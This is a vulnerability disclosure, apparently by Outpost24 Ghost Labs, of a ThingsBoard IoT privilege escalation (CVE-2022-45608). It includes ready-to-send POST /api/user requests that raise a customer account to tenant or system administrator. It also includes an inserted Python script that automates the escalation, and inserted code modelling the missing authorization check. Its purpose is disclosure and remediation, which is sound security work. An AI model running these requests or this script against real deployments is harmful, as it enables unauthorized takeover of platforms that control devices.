Responsible disclosure: access control vulnerability discovered in the ThingsBoard IoT platform

In December 2022, a security researcher from the Outpost24 Ghost Labs team discovered a vulnerability in the ThingsBoard IoT platform through which a normal user's privileges can be escalated with a single POST request carrying a modified 'authority' field; by exploiting the associated flaws, an attacker could take control of the entire platform and related accounts. Upon reporting the vulnerability to the vendor, it was quickly resolved. While the communication was largely one-directional, the time to resolution and patch was swift. It is always a pleasure to see a development team taking user security so seriously.

In the latest version of the product, the vulnerability has been remediated. We strongly urge users of the platform to upgrade to the latest version. This is especially important for anyone who does not control all end users, since an attacker needs initial access as a low-privileged user to obtain the increased permissions.

ThingsBoard Vulnerability summary

  • Product: ThingsBoard IoT platform
  • Affected version(s): v3.4.2 (December 1, 2022) and possibly older
  • CVE-ID: CVE-2022-45608

Vulnerability description

The ThingsBoard IoT platform was affected by a vertical privilege escalation vulnerability.

A low-privileged user (CUSTOMER_USER) was able to escalate their privileges vertically and become tenant administrator (TENANT_ADMIN) or system administrator (SYS_ADMIN) on the web application using a single POST request to the platform's REST API.

To exploit the vulnerability, the attacker needs to know the corresponding API parameter ("authority": "<value>") and the platform's default UUIDs (such as the tenant ID used in the SYS_ADMIN request below), which are easily identified from ThingsBoard's official GitHub repository.
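To make the missing control concrete, the following is a small model of the authorization rule a user-save endpoint needs so that no caller can hand out, or take, more authority than it holds. This is an added example written for this write-up; it is not ThingsBoard's code and does not claim to be the vendor's actual patch, which the page does not detail. The role hierarchy (SYS_ADMIN above TENANT_ADMIN above CUSTOMER_USER), the rule that a caller may only assign authorities strictly below its own, and tenant scoping for non-system callers are assumptions chosen to match how the page describes the roles; the user records are constructed samples.

```python
"""Model of the authorization rule a user-save endpoint needs so that no
caller can hand out, or take, more authority than it holds.

Added illustration for this write-up: not ThingsBoard's code and not the
vendor's actual patch (the page does not detail it). ASSUMPTIONS: the role
hierarchy SYS_ADMIN > TENANT_ADMIN > CUSTOMER_USER, the rule that a caller
may assign only authorities strictly below its own, and tenant scoping for
non-system callers were chosen to match how the page describes the roles.
"""
from dataclasses import dataclass
from typing import Optional

RANK = {"CUSTOMER_USER": 0, "TENANT_ADMIN": 1, "SYS_ADMIN": 2}
# Tenant id used in the page's SYS_ADMIN request (system admins are not tenant-scoped).
NULL_TENANT = "13814000-1dd2-11b2-8080-808080808080"


@dataclass(frozen=True)
class User:
    id: str
    tenant_id: str
    authority: str


class Forbidden(Exception):
    """Raised when the hardened check rejects the save (HTTP 403 in an API)."""


def save_user_vulnerable(caller: User, existing: Optional[User], requested: User) -> User:
    """'Before' behaviour as the page describes it: the body is persisted as
    sent, so a CUSTOMER_USER's own 'authority' field is taken at face value."""
    return requested


def save_user_hardened(caller: User, existing: Optional[User], requested: User) -> User:
    """'After' behaviour. `caller` is the stored record of the authenticated
    principal (derived from the token, never from the body); `existing` is the
    stored record looked up by requested.id, or None when creating a new user."""
    if requested.id == caller.id:
        # Self-service edits may touch profile fields only.
        if requested.authority != caller.authority or requested.tenant_id != caller.tenant_id:
            raise Forbidden("a user cannot change its own authority or tenant")
        return requested
    if RANK[requested.authority] >= RANK[caller.authority]:
        raise Forbidden(f"{caller.authority} may not assign {requested.authority}")
    if existing is not None and RANK[existing.authority] >= RANK[caller.authority]:
        raise Forbidden("cannot modify a user at or above the caller's own level")
    if caller.authority != "SYS_ADMIN":
        same_tenant = requested.tenant_id == caller.tenant_id and (
            existing is None or existing.tenant_id == caller.tenant_id)
        if not same_tenant:
            raise Forbidden("tenant admins manage users of their own tenant only")
    return requested


def demo() -> dict:
    """Replay the page's scenario (a customer user re-posting its own record with
    'authority' set to TENANT_ADMIN) against both implementations and return the
    authority each one would persist."""
    winston = User("u-winston", "t-foo", "CUSTOMER_USER")  # constructed sample record
    escalated = User("u-winston", "t-foo", "TENANT_ADMIN")
    outcome = {"vulnerable": save_user_vulnerable(winston, winston, escalated).authority}
    try:
        save_user_hardened(winston, winston, escalated)
        outcome["hardened"] = "TENANT_ADMIN"
    except Forbidden:
        outcome["hardened"] = "CUSTOMER_USER"
    return outcome


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 'TENANT_ADMIN', 'hardened': 'CUSTOMER_USER'}
```

The two points worth noticing are that the hardened path takes the caller's authority from the authenticated principal rather than from the request body, and that both the requested authority and the authority of the record being overwritten are compared against the caller's level, so neither self-promotion nor editing an administrator's record is possible from a CUSTOMER_USER token.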

Vulnerability impact

Based on our testing of the version current at the time (v3.4.2), we have reason to believe that all customers, across the editions listed below, were affected.

Recreation flow

To verify the vulnerability, these steps were taken by our security researcher:

  1. Log in to the cloud edition, or install the affected ThingsBoard version (3.4.2) on-premises. Affected editions:
     1. ThingsBoard Professional Edition Cloud
     2. ThingsBoard Community Edition
     3. ThingsBoard Professional Edition
  2. After you sign up and log in to your main ThingsBoard dashboard, intercept the outgoing POST request to /api/user and modify the 'authority' value. In this example, we escalate to tenant administrator.

Getting Tenant Administrator access: POST

https://<thingsboardinstance>/api/user?sendActivationMail=false

{
    "id": {
        "entityType": "USER",
        "id": "XXXXXXXXX"
    },
    "createdTime": 0,
    "additionalInfo": {
        "lastLoginTs": 1668422898320,
        "failedLoginAttempts": 0,
        "userCredentialsEnabled": true,
        "lang": "en_US",
        "homeDashboardHideToolbar": false
    },
    "tenantId": {
        "entityType": "TENANT",
        "id": "XXXXXXXXXX"
    },
    "email": "winston@foo.com",
    "authority": "TENANT_ADMIN",
    "firstName": "Winston",
    "lastName": null,
    "name": "winston@foo.com",
    "language": "en_US",
    "homeDashboardHideToolbar": false
}

Getting System Administrator access: POST

https://<thingsboardinstance>/api/user?sendActivationMail=false

{
    "id": {
        "entityType": "USER",
        "id": "XXXXXXXXX"
    },
    "createdTime": 0,
    "additionalInfo": {
        "description": "",
        "defaultDashboardId": null,
        "defaultDashboardFullscreen": false,
        "homeDashboardId": null,
        "homeDashboardHideToolbar": false,
        "userCredentialsEnabled": true,
        "failedLoginAttempts": 0,
        "lang": "en_US"
    },
    "tenantId": {
        "entityType": "TENANT",
        "id": "13814000-1dd2-11b2-8080-808080808080"
    },
    "email": "john@foo.com",
    "authority": "SYS_ADMIN",
    "firstName": "John",
    "lastName": "Wick",
    "name": "john@foo.com",
    "language": "en_US",
    "homeDashboardId": null,
    "homeDashboardHideToolbar": false
}
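The two requests above can be driven end to end with the following script, which doubles as the post-upgrade check: it reports VULNERABLE when the account ends up with the authority it asked for and FIXED when the server refuses the change. This is an added example written for this write-up, not Outpost24's or ThingsBoard's own code. The login endpoint POST /api/auth/login, the self-lookup endpoint GET /api/auth/user and the X-Authorization: Bearer header are taken from ThingsBoard's public REST API and are not mentioned on the page; the instance URL and credentials are placeholders, and SAMPLE_USER is a constructed stand-in for the caller's own user object.

```python
"""Drive the /api/user authority-escalation request end to end and report
whether the target instance is still affected.

Added example written for this write-up; it is not Outpost24's or
ThingsBoard's own code. ASSUMPTIONS (not stated on the page): the login
endpoint POST /api/auth/login taking {"username","password"} and returning
{"token"}, the self-lookup GET /api/auth/user, and the X-Authorization:
Bearer <jwt> header come from ThingsBoard's public REST API; the base URL
and credentials are placeholders; SAMPLE_USER is a constructed stand-in.
"""
import json
import sys
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Roles named on the page, ordered from least to most privileged.
AUTHORITY_RANK = {"CUSTOMER_USER": 0, "TENANT_ADMIN": 1, "SYS_ADMIN": 2}
# Tenant id the page's SYS_ADMIN request uses (system admins are not tenant-scoped).
NULL_TENANT_ID = "13814000-1dd2-11b2-8080-808080808080"

# Constructed stand-in for what GET /api/auth/user returns for a customer user.
SAMPLE_USER = {
    "id": {"entityType": "USER", "id": "XXXXXXXXX"},
    "createdTime": 0,
    "tenantId": {"entityType": "TENANT", "id": "XXXXXXXXXX"},
    "email": "winston@foo.com",
    "authority": "CUSTOMER_USER",
    "firstName": "Winston",
    "lastName": None,
    "name": "winston@foo.com",
}


def build_escalation_payload(current_user: dict, target_authority: str) -> dict:
    """Return the body the page posts to /api/user?sendActivationMail=false:
    the caller's own user object with only 'authority' changed, plus the null
    tenant when asking for SYS_ADMIN. The input dict is left untouched."""
    if target_authority not in AUTHORITY_RANK:
        raise ValueError(f"unknown authority {target_authority!r}")
    payload = json.loads(json.dumps(current_user))  # deep copy via JSON round-trip
    payload["authority"] = target_authority
    if target_authority == "SYS_ADMIN":
        payload["tenantId"] = {"entityType": "TENANT", "id": NULL_TENANT_ID}
    return payload


def classify_result(status: int, user_after: Optional[dict],
                    attempted: str, before: str) -> str:
    """Interpret the POST status together with a fresh GET /api/auth/user.
    VULNERABLE: the account now holds the higher authority it asked for.
    FIXED: the server refused (400/403) and the authority is unchanged.
    INCONCLUSIVE: anything else, e.g. 200 but the field was silently ignored."""
    after = (user_after or {}).get("authority", before)
    if after == attempted and AUTHORITY_RANK[after] > AUTHORITY_RANK[before]:
        return "VULNERABLE"
    if status in (400, 403) and after == before:
        return "FIXED"
    return "INCONCLUSIVE"


def _call(base: str, path: str, token: Optional[str] = None,
          body: Optional[dict] = None) -> Tuple[int, Optional[dict]]:
    """Minimal JSON client; returns (status, parsed body or None on HTTP error)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base + path, data=data,
                                 method="POST" if data is not None else "GET")
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("X-Authorization", f"Bearer {token}")
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        return err.code, None


def check_instance(base: str, username: str, password: str,
                   target: str = "TENANT_ADMIN") -> str:
    """Log in as a low-privileged user, replay the page's request, then
    re-authenticate so the verdict reflects what the server actually persisted."""
    creds = {"username": username, "password": password}
    _, login = _call(base, "/api/auth/login", body=creds)
    if not login or "token" not in login:
        raise RuntimeError("login failed; check base URL and credentials")
    _, me = _call(base, "/api/auth/user", token=login["token"])
    status, _ = _call(base, "/api/user?sendActivationMail=false",
                      token=login["token"], body=build_escalation_payload(me, target))
    _, relogin = _call(base, "/api/auth/login", body=creds)
    _, me_after = _call(base, "/api/auth/user", token=(relogin or {}).get("token"))
    return classify_result(status, me_after, target, me["authority"])


if __name__ == "__main__":
    if len(sys.argv) == 4:  # usage: script.py https://<thingsboardinstance> <user> <password>
        print(check_instance(*sys.argv[1:4]))
    else:  # offline: show the payload built from the constructed sample
        print(json.dumps(build_escalation_payload(SAMPLE_USER, "TENANT_ADMIN"), indent=2))
```

Run it only against an instance you own or are authorized to test, with a freshly created CUSTOMER_USER account: on an affected version the verdict is VULNERABLE and that account is now a tenant administrator, so delete it afterwards. The re-login step matters because the JWT issued at the start still carries the old authority; only a new token or a fresh GET /api/auth/user shows what the server persisted.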

Screenshots

The following screenshots show how the low-level user is able to access admin resources.

[Screenshot: the low-level user with his original ID and token]

[Screenshot: the information the low-level user can access]

[Screenshot: the same user after escalating permissions to Tenant Admin]

Remediation

To remediate this vulnerability, update to the latest version of the ThingsBoard IoT platform. After upgrading, confirm the fix by replaying the request above from a CUSTOMER_USER account: the authority change must be rejected and the account must still report CUSTOMER_USER after a fresh login.

Lessons learned

Any vulnerability in a solution used to remotely control devices in homes or companies brings the risk of becoming a pivot point into those other networks. We have seen this in recent supply chain attacks, most notably the 2020 SolarWinds breach.

If you are an organization that grants access to information via web applications, proactive security testing is key. Beyond testing and auditing your own solution, you need to ensure that your vendors and MSPs are doing the same. Outpost24 provides security solutions to reduce your attack surface. Whether you are an application provider or an MSP, our experts are ready to help you with your security program.

About Ghost Labs


Ghost Labs is the specialist security unit within Outpost24, working in partnership with our clients to meet their penetration testing needs and objectives. Our experienced Offensive Security team offers enhanced and bespoke penetration testing services such as advanced network penetration testing, (web) application testing, Red Teaming assessments and complex web application exploitation to help organizations gain a true picture of their cyber risk. In addition, the Ghost Labs team is an active contributor to the security community through vulnerability research and a coordinated responsible disclosure program.

Ghost Labs performs hundreds of successful penetration tests for its customers, ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers covering a wide range of advanced testing services that help companies keep up with evolving threats and new technologies, drive security maturity and mitigate the risks posed by the evolving threats and techniques of the modern-day hacker.

About the Author

Fotios Liatsis, Senior Security Consultant, Outpost24

Fotios is a Senior Security Consultant with 10 years of experience in cyber security, information security, and IT operations. He excels at identifying system and network vulnerabilities, conducting comprehensive penetration tests, and executing red team engagements and adversarial simulation assessments.